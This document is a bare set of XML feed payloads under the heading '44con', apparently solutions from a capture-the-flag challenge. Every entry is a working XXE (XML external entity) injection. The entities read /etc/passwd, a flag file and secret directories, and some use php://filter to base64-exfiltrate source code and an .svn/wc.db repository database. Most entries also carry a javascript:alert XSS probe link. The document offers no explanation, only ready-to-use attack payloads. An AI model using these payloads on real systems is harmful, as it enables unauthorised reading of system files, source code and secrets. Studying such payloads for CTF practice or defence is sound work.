44con

etc-passwd

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<feed>
    <title>test</title>
    <description>test</description>

    
    
    <entry>
      <title>Test</title>
      <link href="javascript:alert(11)"></link>
      <content>&xxe;</content>
    </entry>
</feed>

flag

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
   <!ENTITY xxe SYSTEM "file:///secret/flag.txt" >
]>
<feed>
    <title>test</title>
    <description>test</description>
    
    <entry>
      <title>Test</title>
      <link href="javascript:alert(11)"></link>
      <content>&xxe;</content>
    </entry>
</feed>

sample

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE feed [
<!ENTITY xxe SYSTEM "/">
]>

<feed>
    <title>test</title>
    <description>test</description>
    
    <entry>
      <title>Hello</title>
      <link href="http://example.com"></link>
      <content>&xxe;</content>
    </entry>
    
</feed>

secret

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
   <!ENTITY xxe SYSTEM "file:///secret" >
]>
<feed>
    <title>test</title>
    <description>test</description>
    
    <entry>
      <title>Test</title>
      <link href="javascript:alert(11)"></link>
      <content>&xxe;</content>
    </entry>
</feed>

test_dev.php

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
   <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=test_dev.php" >
]>
<feed>
    <title>test</title>
    <description>test</description>
    
    <entry>
      <title>Test</title>
      <link href="javascript:alert(11)"></link>
      <content>&xxe;</content>
    </entry>
</feed>

wc.db

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
   <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=.svn/wc.db" >
]>
<feed>
    <title>test</title>
    <description>test</description>
    
    <entry>
      <title>Test</title>
      <link href="javascript:alert(11)"></link>
      <content>&xxe;</content>
    </entry>
</feed>